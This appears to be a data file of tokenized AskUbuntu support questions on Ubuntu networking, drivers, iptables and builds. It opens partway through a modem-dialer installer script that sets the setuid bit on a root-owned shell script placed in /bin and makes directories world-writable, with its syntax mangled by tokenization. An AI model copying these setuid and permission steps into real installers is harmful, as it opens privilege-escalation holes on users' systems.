temp_dir/* $ des_dir/ retplace= $ ? if [ $ retplace ! = '0 ' ] ; then cp -rf $ backup_des_dir/* $ des_dir/ echo -e `` replacing file failed . '' echo -e `` installation will abort . '' exit -1 ; else echo -e `` repalcing file successfully . '' rm -rf $ backup_des_dir fi fi # replace files-two-frase-production-by-yh -- 20090822 -- end -- -- -- -- - # ******************************************************** sys_ppp_dir= '' /etc/ppp '' if [ -e $ sys_ppp_dir -a -d $ sys_ppp_dir ] ; then chmod a+x $ sys_ppp_dir fi peers_dir= '' /etc/ppp/peers '' if [ -e $ peers_dir -a -d $ peers_dir ] ; then chmod a+x $ peers_dir fi chmod 0755 $ install_path/pppd/ip-up.local cp -f $ install_path/pppd/ip-up.local /etc/ppp/ip-up.local chmod 0755 $ install_path/pppd/ip-down.local cp -f $ install_path/pppd/ip-down.local /etc/ppp/ip-down.local chmod 0755 $ install_path/pppd/get_route_info cp -f $ install_path/pppd/get_route_info /etc/ppp/get_route_info chmod 0755 $ install_path/usr/share/applications/ $ exe_file.desktop cp -f $ install_path/usr/share/applications/ $ exe_file.desktop /usr/share/applications/ $ exe_file.desktop chmod 0755 $ install_path/usr/share/pixmaps/ $ exe_file.png cp -f $ install_path/usr/share/pixmaps/ $ exe_file.png /usr/share/pixmaps/ $ exe_file.png chmod 0755 $ install_path/bin/ $ exe_file cp -f $ install_path/bin/ $ exe_file /bin/ $ exe_file chmod 0755 /usr/bin/wvdial chmod 0755 /usr/sbin/pppd chmod 0755 $ run_evince chmod 0755 $ aplay # added by chenying 2009-11-26 chmod a+x $ install_path/data/run_evince.sh # xt add update script 090617 chmod 0755 $ sys_path/ $ new_file_path_tata/ $ update_file cd $ sys_path/ $ new_file_path_tata/usr/lib cp * /usr/lib if [ `` $ ( cat /etc/lsb-release | grep ubuntu ) '' ! = `` '' ] ; then if [ ! -l /usr/lib/libcurl.so.4 ] ; then ln -s /usr/lib/libcurl-gnutls.so.4 /usr/lib/libcurl.so.4 fi elif [ `` $ ( cat /etc/debian_version ) '' == '' 4.0 '' ] ; then if [ ! -l /usr/lib/libcurl.so.4 ] ; then ln -s /usr/lib/libcurl.so.3.0.0 /usr/lib/libcurl.so.4 fi fi # add end 090617 tmp_file=/etc/wvdial.conf if [ -f $ tmp_file ] ; then chmod 0755 $ tmp_file else cp -f $ install_path/data $ tmp_file $ tmp_file chmod 0755 $ tmp_file fi tmp_file=/etc/ppp/options if [ -f $ tmp_file ] ; then chmod 0755 $ tmp_file else cp -f $ install_path/data $ tmp_file $ tmp_file chmod 0755 $ tmp_file fi tmp_file=/etc/ppp/resolv.conf if [ -f $ tmp_file ] ; then chmod 0755 $ tmp_file else cp -f $ install_path/data $ tmp_file $ tmp_file chmod 0755 $ tmp_file fi tmp_file=/etc/resolv.conf if [ -f $ tmp_file ] ; then chmod 0755 $ tmp_file else cp -f $ install_path/data $ tmp_file $ tmp_file chmod 0755 $ tmp_file fi # add by chenying 2009-3-5 tmp_file=/etc/resolv.conf.bak if [ -f $ tmp_file ] ; then chmod 0755 $ tmp_file fi tmp_file=/etc/resolv.conf.prev if [ -f $ tmp_file ] ; then chmod 0755 $ tmp_file fi tmp_file=/etc/ppp/peers/wvdial if [ -f $ tmp_file ] ; then chmod 0755 $ tmp_file else cp -f $ install_path/data $ tmp_file $ tmp_file chmod 0755 $ tmp_file fi # language select and help file # tmp_file= $ install_path/bin/ $ language/ $ qm_name # if [ -f $ tmp_file ] ; then # chmod 0755 $ tmp_file # cp -f $ tmp_file $ install_path/data/ $ qm_name # fi # tmp_file= $ install_path/bin/ $ language/ $ help # cp -r $ tmp_file $ install_path/data chmod 0777 $ sys_path chmod 0777 $ sys_path/ $ file_name chown root.root $ install_path/ $ exe_file chmod 0755 $ install_path/ $ exe_file chmod u+s $ install_path/ $ exe_file chmod 0755 $ install_path/uninstall.sh # install language echo `` install the fonts ... '' cp -rf $ install_path/data/fonts/arial /usr/share/fonts/truetype/ echo `` refurbish the font cache ... '' fc-cache # tmp_file= $ install_path/bin/9-cdrom.rules cp -f $ tmp_file /etc/udev/rules.d/9-cdrom.rules # if locate udevadm > /dev/null 2 > & 1 if [ -f /sbin/udevadm ] then /sbin/udevadm control reload_rules > /dev/null 2 > & 1 /sbin/udevadm control -- reload-rules > /dev/null 2 > & 1 /sbin/udevadm trigger -- subsystem-match=block echo `` udevadm is exist ! '' else /sbin/udevcontrol reload_rules /sbin/udevtrigger -- subsystem-match=block echo `` udevadm is n't exist ! '' fi rm -f $ install_path/bin/9-cdrom.rules # remove temp file rm -f $ sys_path/ $ file_name.tar.gz # modified by chenying 2009-5-5 , install driver begin xt add 081126 echo ******begin to $ install_path/driver cd $ install_path/driver chmod 0755 driver_install.run ./driver_install.run echo ****** end to $ install_path/driver # install driver end # added selinux 's moudle by chenying cd $ install_path/driver chmod 0755 se if [ -n `` `uname -r |grep fc` '' ] ; then ./se `` /usr/sbin/semodule -i disselfirefox.pp '' ./se `` /usr/sbin/semodule -i nm.pp '' echo `` it 's ok ! '' fi # the end # change user group while read line do user2ch= $ { line % % : * } line= $ { line # * : } line= $ { line # * : } user_id= $ { line % % : * } if [ $ user_id -ge 1000 ] ; then if [ $ user2ch ! = `` nobody '' ] ; then # echo $ user2ch : $ user_id /usr/sbin/usermod -a -g netdev , dialout , dip $ user2ch fi fi done < /etc/passwd tmp_file= $ install_path/launch-gui.sh if [ -f $ tmp_file ] ; then chown root.root $ tmp_file chmod 0755 $ tmp_file chmod u+s $ tmp_file cp -f $ tmp_file /bin fi # restore data cd ~ restorepah= $ ( pwd ) cd - if [ -e $ restorepah/sms.xml -o -e $ restorepah/contact.xml -o -e $ restorepah/historyrecord.xml ] ; then echo `` restain path is $ restorepah '' echo `` do you want to restore saved user data ? ( y/n ) : '' read select if [ $ select == `` yes '' -o $ select == `` yes '' -o $ select == `` y '' -o $ select == `` y '' ] ; then tmp_file= $ restorepah/sms.xml if [ -f $ tmp_file ] ; then rm -rf $ install_path/data/sms.xml cp -f $ tmp_file $ install_path/data/ echo `` ... .sms data has been restored '' fi tmp_file= $ restorepah/contact.xml if [ -e $ tmp_file ] ; then rm -rf $ install_path/data/contact.xml cp -f $ tmp_file $ install_path/data/ echo `` ... .contact data has been resotored '' fi tmp_file= $ restorepah/historyrecord.xml if [ -e $ tmp_file ] ; then rm -rf $ install_path/data/historyrecord.xml cp -f $ tmp_file $ install_path/data/ echo `` ... .historyrecord data has been resotored '' fi echo `` data has been restored successfully '' fi fi # ******************************************************** # update -two-frase-production-by-yh -- 20090822 -- begin -- -- -- -- - if [ $ two_on == 'true ' -a $ rettfp == '0 ' -a -f $ last_run ] ; then chmod +x $ last_run $ last_run $ return_choose_lang else echo `` install completed ! ! ! '' echo `` ... .after setup , you will find the $ display_name in \ '' applications- > internet- > $ display_name\ '' . click the $ display_name and the application will run '' read -p `` press any key to continue ... . `` -n 1 # run $ exe_file fi # update-two-frase-production-by-yh -- 20090822 -- end -- -- -- -- - # ********************************************************
439807	sharing wifi through my device but others not getting internet connection	i have shared my internet connection making my laptop a wi-fi hotspot through ubuntu 12.04 lts . but other devices which are trying to connect to my hotspot , it is showing connected but they are not getting any internet connection .
439809	what package should i include as build-depend based on this error	previously , i 've asked about debian/rules additional build flag of cmake for packaging in launchpad . the question is here . now i managed to accomplish that by changing that debian/rules . and i managed to do bzr builddeb -- -us -uc in my local computer . i do n't know exactly what packages to be included as build-depend in the clean machine . the latest error log in launchpad build system is like this : cmake error at /opt/qt52/lib/cmake/qt5gui/qt5guiconfigextras.cmake:16 ( message ) : failed to find `` gl '' in `` '' with cmake_cxx_library_architecture `` i386-linux-gnu '' . call stack ( most recent call first ) : /opt/qt52/lib/cmake/qt5gui/qt5guiconfigextras.cmake:50 ( _qt5gui_find_extra_libs ) /opt/qt52/lib/cmake/qt5gui/qt5guiconfig.cmake:143 ( include ) /opt/qt52/lib/cmake/qt5widgets/qt5widgetsconfig.cmake:88 ( find_package ) /opt/qt52/lib/cmake/qt5svg/qt5svgconfig.cmake:88 ( find_package ) /opt/qt52/lib/cmake/qt5/qt5config.cmake:26 ( find_package ) src/sigil/cmakelists.txt:38 ( find_package ) any idea ? edit : okay , no one answered . but fortunately , i 've found that libgl1-mesa-dev and libglu1-mesa-dev are what i 'm looking for . and the building seems to go successfully : here but , hold on , something is still missing . edit 2 : eventually , it is successfully built . this is the build log
439812	ca n't start byobu ?	i can type this command byobu on the terminal and byobu will start but when i click on the gui icon it starts and closes fast . what i did before that is enable autolaunch and then disable it i thought i should mention this because of this bug . how could i fix this ? i 'm on ubnutu 12.04.4
439813	what is the difference between `` root '' , `` user '' , `` group '' ?	i am new in using ubuntuserver13.10 so during giving permission to a folder to open it on filezilla on other pc , i got these words and now i want to know about the difference between ; `` root '' , `` user '' , `` group '' , `` guest '' and their security levels . so can anyone explain to me briefly about their function and usage . just the basics , or provide a link to an external article on them .
439814	ubuntu server 12.10 /dev/sda1 disk full	my server /dev/sda1 disk full root @ server : /var/www # df filesystem 1k-blocks used available use % mounted on /dev/sda1 48060296 45653236 0 100 % / udev 8055724 12 8055712 1 % /dev tmpfs 3225816 1140 3224676 1 % /run none 5120 0 5120 0 % /run/lock none 8064536 144 8064392 1 % /run/shm /dev/sda3 908566268 580691288 281722432 68 % /home previously when i perform apt-get autoclean & clean i can solve the issue by clear some space . but this time it 's not working . i wish to know which directory under /dev/sda1 but i could n't check on it . how should i do ? which directory i should look into it and delete those folder ? it 's caused mysql is jam now . thanks .
439818	add printer epson l110	i have been using kubuntu 13.10 now , . but i have problem , . when i have installed driver epson l110 on my kubuntu i dont know how to print on my kubuntu , . i cant printer device in my kubuntu ) can somebody help me please ?
439820	apport vs whoopsie !	from my readings i found that both do the same job by collecting crash reports to send it to canonical . so why there is two daemon processes doing the same job ? if there differences between them , so what are these differences ?
439825	laptop battery capacity reduced to 85 %	i have a dell inspiron 5521 and have ubuntu 13.10 on it . i noticed that my battery capacity reduced to 85.2 % . is there a solution for this ? thanks , leo .
439826	detecting hdmi wiring	i have been trying to get hdmi output to work on my laptop which has intel hd 4600 and nvidia k2100m for graphics managed by bumblebee . 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) 01:00.0 vga compatible controller : nvidia corporation gk106glm [ quadro k2100m ] ( rev ff ) xrandr simply shows the cable as disconnected even when it is plugged in , and the monitor displays `` no signal '' . vga1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) so i was reading the bumblebee documentation here and came across this paragraph : optimus laptops have two video chips : an integrated intel and a discrete nvidia one . if the port ( displayport / hdmi / vga ) is wired to the intel chip , you do not need to do anything special to get external monitors to work . i was wondering if this could be the problem with my laptop ( dell precision m4800 ) , and if there was a simple command that would let me test for this hardware configuration . i did not follow through with the rest of the bumblebee documentation as it seems pretty involved and i did n't want to mess things up as this is my primary workstation . also , udevadm monitor does not fire an event when the hdmi cable is plugged in/unplugged , but does fire events for vga when running over intel graphics .
439827	unable to resolve host in both firefox and chrome	i am using ubuntu 13.10 . my internet connection mysteriously stops working in both chrome and firefox with resolving host taking forever . when i switch to windows , my internet is working perfectly fine . kindly help me out here folks , i switched from 12.04 to 13.10 in hope of this problem being fixed but to no avail .
439828	multi hop ping in ubuntu 12.04lts	i have 4 static ip 's ( 10.42.43.1 , 10.42.43.2 , 10.42.43.3 , 10.42.43.4 ) in 4 different systems . the system with ip 10.42.43.1 can ping 10.42.43.2 and the system with ip 10.42.43.2 can ping 10.42.43.4 and the system with ip 10.42.43.4 can ping 10.42.43.3 . 10.42.43.1 -- can ping -- > 10.42.43.2 -- can ping -- > 10.42.43.4 -- can ping -- > 10.42.43.3 but the system with ip 10.42.43.1 can not ping the system with 10.42.43.3 . it says host unreachable . so is there any work around ( modifying kernel ip routing or route command ) which would allow me to ping the system with ip 10.42.43.3 from 10.42.43.1 via the intermediate system . actually i am working on a project that requires the above implementation . any help would be appreciated ...
439829	how do i resolve webpage encoding issues when using a proxy ?	unless i disable proxy , webpages show up as characters like |ˆsš˜mð { ýîsqð|0mvà|ð| } } } 0 } @ } p } ` } p } € } p } } ° } à } ð } à } ð } ~~ ~0~ @ ~p~`~p~€~p~ ~°~à~ð~à~€€ €0€ @ €p€`€p€€€p€ €°€à€ð€à€ð€aa a0a @ apa`apa€apa a°aàaðaàaða‚‚ or else as a .bin file available for download . for example https : //dpaste.de/epvx is what http : //stumblingandmumbling.typepad.com/stumbling_and_mumbling/2014/03/ex-growth.html looks like if i go through the system proxy . if i use w3m through an ssh connection then webpages display fine . ttytter works fine . vlc can even play the same youtube video at the same time as firefox ca n't load the site . i infer from this that those programs must use proxies differently . once i change the proxy from `` system default '' to `` none '' this problem goes away in firefox . aliasing w3m to w3m -no-proxy works for naked w3m but not in wrappers like surfraw . however , curl and by extension r still ca n't fetch data—and even sudo apt-get install is having problems . i 'm not even sure where the system default proxy settings are coming from . if i try to google about it i end up being directed to squid -- which i 'm not sure is what i want .
439830	gedit 3.8.3 several plugins do not work	i have upgraded to ubuntu 13.10 ( and thus gedit 3.8.3 ) , and several plugins i was using in gedit ( like `` session save '' and strl-tab navigation throught tabs ) are now unavailable . can you help get them back ? thanks gedit-plugins is installed already
439832	how to display only the path of corresponding command 's man page ?	i want to get the corresponding man page path for a particular command . is there any single command to display only the man page path for a particular command ?
439836	extra mouse buttons not working in virtualization ( vmware/virtualbox , ubuntu host )	i 'm trying to run vmware workstation and/or virtualbox on ubuntu . the virtual machines are working perfectly in both applications , except for the extra mouse buttons ( forward/backward ) . in ubuntu the mouse buttons are all working . virtualization applications : vmware workstation 10.0.1 , latest virtualbox ubuntu versions i tested as host : 12.04 , 13.10 , 14.04 beta guest os i tested : windows 7 , several linux os in live-mode mice i tested ( all with side buttons ) : logitech m510 ( unifying receiver ) , old razer copperhead , no-name-mouse i already tried a lot of solutions i found online e.g . changing the mouse-settings in .vmx on vmware ws ( mouse.vusb.enable , ... ) , changing the input-settings on vmware/virtualbox , reinstall guest tools on guest os , ... i think it 's a problem in ubuntu and not in the virtualization applications . does anyone have a solution for this ?
439840	reg logical drive not working	i will using ubuntu 10.04 lts and 13.04 32 bit . i will full format and install ubuntu in sda1 after finishing installation logical drive sda2 and sda 3 not open . i will right click on that drive only unmount and properties is visible .
439842	my toshiba laptop with ubuntu 13.10 has network connections disabled on waking up from hibernate	my toshiba laptop with ubuntu 13.10 has network connections disabled on waking up from hibernate . then , i have to once execute suspend and then , the connections are enabled . also , it takes quite a while to boot from hibernation ( i have only 3gb ram ) . sometimes on wake up from hibernation , the laptop shuts down . sometimes during wake up from hibernation , the laptop hangs and i have to forcefully press the power button to switch off power .
439843	iptables and bind9 to forward to google 's dns	hello i have a very hard time on getting along with iptables and bind9 as my internal network dns server . it 's configured to forward my queries to google 's dns ( 8.8.8.8 ) . the main problem is i ca n't configure iptables to allow to speak with my dns . my main rule is to drop all input and output connections and allow only those i require for some services and bind9 . here is my iptables now chain input ( policy drop ) target prot opt source destination accept tcp -- anywhere anywhere tcp dpt:1155 accept tcp -- anywhere anywhere accept udp -- anywhere anywhere udp spt : domain accept all -- anywhere anywhere chain forward ( policy drop ) target prot opt source destination chain output ( policy drop ) target prot opt source destination accept tcp -- anywhere anywhere tcp spt:1155 state related , established accept tcp -- anywhere anywhere accept udp -- anywhere anywhere udp dpt : domain accept all -- anywhere anywhere i have tried to use what this user says but with no luck . also i have tried many combinations allowing port 53 for udp and tcp like this sudo iptables -a input -s 192.168.0.0/24 -m state -- state new -p tcp -- dport 53 -j accept sudo iptables -a input -s 192.168.0.0/24 -m state -- state new -p udp -- dport 53 -j accept also here is what i get from sudo netstat -anp | grep -e tcp -e udp tcp 0 0 0.0.0.0:1155 0.0.0.0 : * listen 969/sshd tcp 0 0 0.0.0.0:80 0.0.0.0 : * listen 1179/apache2 tcp 0 0 192.168.0.22:53 0.0.0.0 : * listen 1087/named tcp 0 0 127.0.0.1:53 0.0.0.0 : * listen 1087/named tcp 0 0 127.0.0.1:953 0.0.0.0 : * listen 1087/named tcp 0 0 192.168.0.22:1155 192.168.0.20:50016 established 1263/sshd : giorgos tcp6 0 0 : ::1155 : : : * listen 969/sshd tcp6 0 0 : ::53 : : : * listen 1087/named tcp6 0 0 : :1:953 : : : * listen 1087/named udp 0 0 192.168.0.22:53 0.0.0.0 : * 1087/named udp 0 0 127.0.0.1:53 0.0.0.0 : * 1087/named udp 0 0 0.0.0.0:68 0.0.0.0 : * 943/dhclient3 udp6 0 0 : ::53 : : : * 1087/named
439847	choosing ubuntu based distro for my laptop	i have linux mint 16 kde installed along with windows 8.1 on my laptop . but kde runs very slow on my laptop . my laptop configuration is intel core i3 cpu ( 380m ) 3 gb ddr3 ram 500gb hdd 15.6 inch display no graphics card i want to use ubuntu considering its popularity in linux and package database . my key requirement is performance and a good/decent ui . i do n't want ubuntu as i am not a big fan of unity . i have shortlisted lubuntu and xubuntu distros . which one should i use , please suggest ? suggest any other options as well .
439848	attach / detach problem for passthrough/sr-iov in libvirt	i just encountered a problem in libvirt while was trying to attach and detach a sr-iov vf to my vm the version of my libvirt is 1.1.1-0ubuntu8.5 i tried to attach the device using following xml < interface type='hostdev ' managed='yes ' > < mac address='5c:01 : fd:12:34:58'/ > < source > < address type='pci ' domain='0x0000 ' bus='0x04 ' slot='0x01 ' function='0x1'/ > < /source > < /interface > when i attached device it worked properly and i managed to ping another host . virsh # attach-device t5 1.xml device attached successfully but when i detached it still i had network traffic in my vm but libvirt ( virsh ) said that . virsh # detach-device t5 1.xml device detached successfully the next time i tried to attach it libvirt said that virsh # attach-device t5 1.xml error : failed to attach device from 1.xml error : requested operation is not valid : pci device 0000:04:01.1 is in use by domain t5 i tried it with different vms and different guest oss that the same happened . the same action was done with another host running libvirt version installed : 1.0.2-0ubuntu11.13.04.5~cloud1 candidate : 1.0.2-0ubuntu11.13.04.5~cloud1 and it worked pretty ok. no problem . do you have any idea what is wrong ? more information : kernel : 3.8.0-37-generic /etc/libvirt/qemu.conf : security_driver = `` noneâ root @ compute01 : ~ # ethtool -i eth5 driver : bnx2x version : 1.78.58 firmware-version : bc 7.4.22 phy 1.34 bus-info : 0000:04:00.1 supports-statistics : yes supports-test : yes supports-eeprom-access : yes supports-register-dump : yes
439851	how to install trust sc-5500p usb 5.1 external sound card ?	( i use ubuntu 14.04 64bit and the sound card is not broken as it works fine on windows ) according to most of the reports online installing sc-5500p on ubuntu seemed to be a cinch for most of the time . some report that it even worked plug and play . at the end the day it can be said pretty safely that sc-5500p is built on standard audio drivers . the following seems to be a more detailed version of what the gui sound manager offers me ( no trust here ) : $ > cat /proc/asound/cards 0 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xf7410000 irq 47 1 [ nvidia ] : hda-intel - hda nvidia hda nvidia at 0xf6080000 irq 17 2 [ device ] : usb-audio - usb sound device usb sound device at usb-0000:00:14.0-1 , full speed the following is the output of lsusb -v which regards devices featuring the `` trust '' . the details of the second entry ( after `` [ ... ] '' ) is actually leaving no doubt that the referred to device is the sc-5500p . bus 003 device 002 : id 15d9:0a4f trust international b.v. device descriptor : blength 18 bdescriptortype 1 bcdusb 1.10 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 8 idvendor 0x15d9 trust international b.v. idproduct 0x0a4f bcddevice 1.00 imanufacturer 0 iproduct 1 usb optical mouse iserial 0 bnumconfigurations 1 configuration descriptor : [ ... ] bus 003 device 003 : id 145f:0143 trust device descriptor : blength 18 bdescriptortype 1 bcdusb 1.10 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 8 idvendor 0x145f trust idproduct 0x0143 bcddevice 0.10 imanufacturer 0 iproduct 2 usb sound device iserial 0 bnumconfigurations 1 configuration descriptor : [ ... ] as suggested here i altered /etc/pulse/daemon.conf to feature the following two settings - but to no avail : default-sample-channels = 6 enable-lfe-remixing = yes content of /etc/pusle/daemon.conf : ; daemonize = no ; fail = yes ; allow-module-loading = yes ; allow-exit = yes ; use-pid-file = yes ; system-instance = no ; local-server-type = user ; enable-shm = yes ; shm-size-bytes = 0 # setting this 0 will use the system-default , usually 64 mib ; lock-memory = no ; cpu-limit = no ; high-priority = yes ; nice-level = -11 ; realtime-scheduling = yes ; realtime-priority = 5 ; exit-idle-time = 20 ; scache-idle-time = 20 ; dl-search-path = ( depends on architecture ) ; load-default-script-file = yes ; default-script-file = /etc/pulse/default.pa ; log-target = auto ; log-level = notice ; log-meta = no ; log-time = no ; log-backtrace = 0 resample-method = speex-float-1 ; enable-remixing = yes enable-lfe-remixing = yes flat-volumes = no ; rlimit-fsize = -1 ; rlimit-data = -1 ; rlimit-stack = -1 ; rlimit-core = -1 ; rlimit-as = -1 ; rlimit-rss = -1 ; rlimit-nproc = -1 ; rlimit-nofile = 256 ; rlimit-memlock = -1 ; rlimit-locks = -1 ; rlimit-sigpending = -1 ; rlimit-msgqueue = -1 ; rlimit-nice = 31 ; rlimit-rtprio = 9 ; rlimit-rttime = 1000000 ; default-sample-format = s16le ; default-sample-rate = 44100 ; alternate-sample-rate = 48000 default-sample-channels = 6 ; default-channel-map = front-left , front-right default-fragments = 8 default-fragment-size-msec = 10 ; enable-deferred-volume = yes deferred-volume-safety-margin-usec = 1 ; deferred-volume-extra-delay-usec = 0 in conjunction with installation of other usb devices on ubuntu it is sometimes mentioned that /etc/modules has to be extended with a line telling the kernel to load drivers or something . currently /etc/modules just contains two lines : > cat /etc/modules lp rtc see `` card2 '' in the end . i guess this is again my trust device : > sudo aplay -l **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : alc892 analog [ alc892 analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 1 : alc892 digital [ alc892 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 9 : hdmi 3 [ hdmi 3 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : device [ usb sound device ] , device 0 : usb audio [ usb audio ] subdevices : 1/1 subdevice # 0 : subdevice # 0
439852	emgucv installation on ubuntu 12.04	how to install emgucv , properly on ubuntu 12.04 ?
439860	unable to locate any package while installing from terminal	i was mashing with my computer and it start showing this error , while installing any software ( sl , git , gvim , etc ) it shows e : unable to locate package ( package_name )
439861	will i be able to use gnome-session-fallback with 14.04 ?	i am a passionate hater of unity ( sorry ) and the first thing i did last time with 12.04 was install gnome-session-fallback to get the layout i wanted . now i am going to get a new computer soon and want to use the 14.04 for the long term support . however unity is a deal-breaker for me , i will go with mint before i will put up with unity . so , the big question is , will gnome-session-fallback be usable with 14.04 ? i would assume i can ( exactly why is the leadership trying to limit my choices ? ) , but this page worries me , as it states the package was removed in 14.04 : http : //www.ubuntuupdates.org/package/core/trusty/universe/proposed/gnome-session-fallback will i be able to use gnome-session-fallback in trusty ( and presumably later releases ) ?
439862	what is the /opt/mingw64 /opt/mingw32 equivalent for ubuntu	many manuals and tutorials about cross compiling windows binaries with the mingw toolchain pointing out /opt/mingw64 or /opt/mingw32 . e.g . like this $ sudo path= $ path : /opt/mingw64/bin make install or here cross_compile= '' x86_64-w64-mingw32- '' ./configure mingw64 no-asm shared -- prefix=/opt/mingw64 all these examples assume that the mingw toolchain is installed by hand . what is now the equivalent if i installed the mingw toolchain via apt ? update : to clarify this , i know my system and i know where things get installed . i ask more for the `` best practice '' to use them if i go the packed manager way . think it 's not the best question i ever made : )
439865	audiobuffer error when trying to install webkit-gtk	i 'm trying to install the latest webkit-gtk from source . i have a problem with fogger not working with wunderlist , and am trying to see if upgrading the webkit will help . when i run make on the config file the process breaks with the error gen libwebcorelayergtk2.a cxxld programs/webkitpluginprocess source/webcore/modules/webaudio/.libs/libwebcoremodules_la-audiobuffer.o : in function `_zn7webcore11audiobufferc2ejmf ' : audiobuffer.cpp : ( .text+0x493 ) : undefined reference to `_zn3jsc21generictypedarrayviewins_14float32adaptoree6createej' source/webcore/modules/webaudio/.libs/libwebcoremodules_la-audiobuffer.o : in function `_zn7webcore11audiobufferc2epns_8audiobuse ' : audiobuffer.cpp : ( .text+0x649 ) : undefined reference to `_zn3jsc21generictypedarrayviewins_14float32adaptoree6createej' collect2 : error : ld returned 1 exit status make [ 1 ] : *** [ programs/webkitpluginprocess ] error 1 make [ 1 ] : leaving directory `/home/tahnoon/downloads/webkitgtk-2.4.0' make : *** [ all ] error 2 how can i investigate what is causing the error and how can i fix it ? thanks edited following mitch 's comment below after installing libwebkit-deb i get the following error message source/webcore/page/animation/csspropertyanimation.cpp : in constructor 'webcore : :propertywrapperacceleratedfilter : :propertywrapperacceleratedfilter ( ) ' : source/webcore/page/animation/csspropertyanimation.cpp:574:52 : error : 'csspropertywebkitfilter ' was not declared in this scope : propertywrapper < const filteroperations & > ( csspropertywebkitfilter , & renderstyle : :filter , & renderstyle : :setfilter ) ^ make [ 1 ] : [ source/webcore/page/animation/libwebcore_la-csspropertyanimation.lo ] error 1 ( ignored ) mv : can not stat ‘source/webcore/page/animation/.deps/libwebcore_la-csspropertyanimation.tpo’ : no such file or directory make [ 1 ] : [ source/webcore/page/animation/libwebcore_la-csspropertyanimation.lo ] error 1 ( ignored ) cxx source/webcore/page/animation/libwebcore_la-implicitanimation.lo cxx source/webcore/page/animation/libwebcore_la-keyframeanimation.lo source/webcore/page/animation/keyframeanimation.cpp : in member function 'void webcore : :keyframeanimation : :checkformatchingfilterfunctionlists ( ) ' : source/webcore/page/animation/keyframeanimation.cpp:396:65 : error : 'csspropertywebkitfilter ' was not declared in this scope if ( m_keyframes.size ( ) < 2 || ! m_keyframes.containsproperty ( csspropertywebkitfilter ) ) ^ make [ 1 ] : [ source/webcore/page/animation/libwebcore_la-keyframeanimation.lo ] error 1 ( ignored ) mv : can not stat ‘source/webcore/page/animation/.deps/libwebcore_la-keyframeanimation.tpo’ : no such file or directory make [ 1 ] : [ source/webcore/page/animation/libwebcore_la-keyframeanimation.lo ] error 1 ( ignored )
439869	extract number from string	when using this ubuntu command : $ { home } /temp/.git describe -- always -- tags head the output of this command is : v0.1.5-2-p343h3d3 i want to extract 1.5 from the output above and check if it 's greater than 1.5 or not . is there any solution for this . ?
439875	ubuntu 12.04 lts hangs ( all black ) before showing login screen	attracted by the open-source philosophy and the idea of a free system from the people for the people i decided to throw away my window 7 and replace it with ubuntu 12.04 ( i even bought it , just to feel like a contributor , part of the project ) . anyway , i always found myself in the situation of having nothing else to do but re-install it because of these strange , unexpected and hard to understand errors . it happens almost each 2 or 3 weeks , just after i have installed a little more software than the default . i am quite disappointed and thinking about going back to some more stable system but i will try my last chance with the community , which i see is one of the most active and maybe it´s the pro that will keep me here . also , this is my first question here so forgive my lack of experience . so , i have a laptop ( hp pavilion g6 2305 sq , with amd radeon hd 7670m ) and i have installed ubuntu 12.04.4 lts ( amd64 ) . i installed the proprietary drivers recommended by the system ( fglrx , i think is how they are code-named ) . everything was fine until yesterday , when i compiled and installed various libraries that i need to develop some applications ( ogre3d , ois , boost , ode , freetype and much more ) . i don´t see how this would affect the boot-ing or the kernel because they are just headers , libraries and source code to use when developing applications . but is after this when it happened . this issues usually happen after playing a little bit with the 3d graphics . at some point i realized that the icons of the running applications were not shown on the lateral bar and when i exited the system it forcefully closed some applications . today when i start the computer it shows me the grub loader , i select ubuntu , with linux 3.11.0-18-generic and press enter . the loading screen is doing its job for a few seconds then a black screen is where everything hangs . i restart ( ctrl+alt+del ) and choose recovery mode . if i choose to clean , dpkg , failsafex , everything will hang with this line of text : fsck from util-linux 2.20.1 /dev/sda1 : clean , 694243/60530688 files , 20142664/242119168 blocks i click ctrl+c and now it fails ( of course ) with this line : initctl : event failed ctrl+alt+del will reboot the system . now , i tried this solution : is recovery mode supposed to hang after fsck ? for the fsck problem ( the hanging ) but i am just left in the sda1 partition ( where i don´t know what i am supposed to do ) . i purged some nvidia packages ( only for development ) and with sudo apt-get autoremove i removed unecessary packages . i reboot and the same issue : black screen just before entering the login screen . i inserted the live cd and i opened some log files but they don´t tell me much either . in syslog is where i found the most recent logs : http : //pastebin.com/tcf0c4py if while seeing the loading screen i press esc to get in cli mode the same happens . i see some text on the screen then at some point everything goes to black . some weeks ago , when the problem was related to gflrx i could enter cli mode from the loading screen . in other words , i don´t have access to the system as root , so i can reset things . also , i am using a broad-band connection , which doesn´t connect automatically if the x system is not loaded and the gui is working . so , here i am , out of any idea or possibility . if you need any other log file or info just let me know . i hope this can be fixed . thanks so much
439876	mixed installation - how to remove older version of openscenegraph	i 'm trying to solve an issue osg_forum with openscenegraph and i found out that i have 2 versions of openscenegraph installed ( dont know how it happened ) . i would like to uninstall both of them and reinstall one of them i just removed with sudo make uninstall called from build folder and it removed /usr/local/lib64 libraries , includes etc.. and i dont know how to remove the other one which is located in /usr/lib . i dont have any `` build folder '' where i could use make uninstall and sudo apt-get remove openscenegraph doesnt do the job ( i just noticed that it removed osgmovie bin for example.. ) is it save to just delete it ? because when i want to play movie using osgmovie then it loads /usr/lib/osgplugin.ffmpeg.so and not /usr/local/lib64/osgplugin.ffmpeg.so and i really dont want to `` mess '' with these libraries even more .
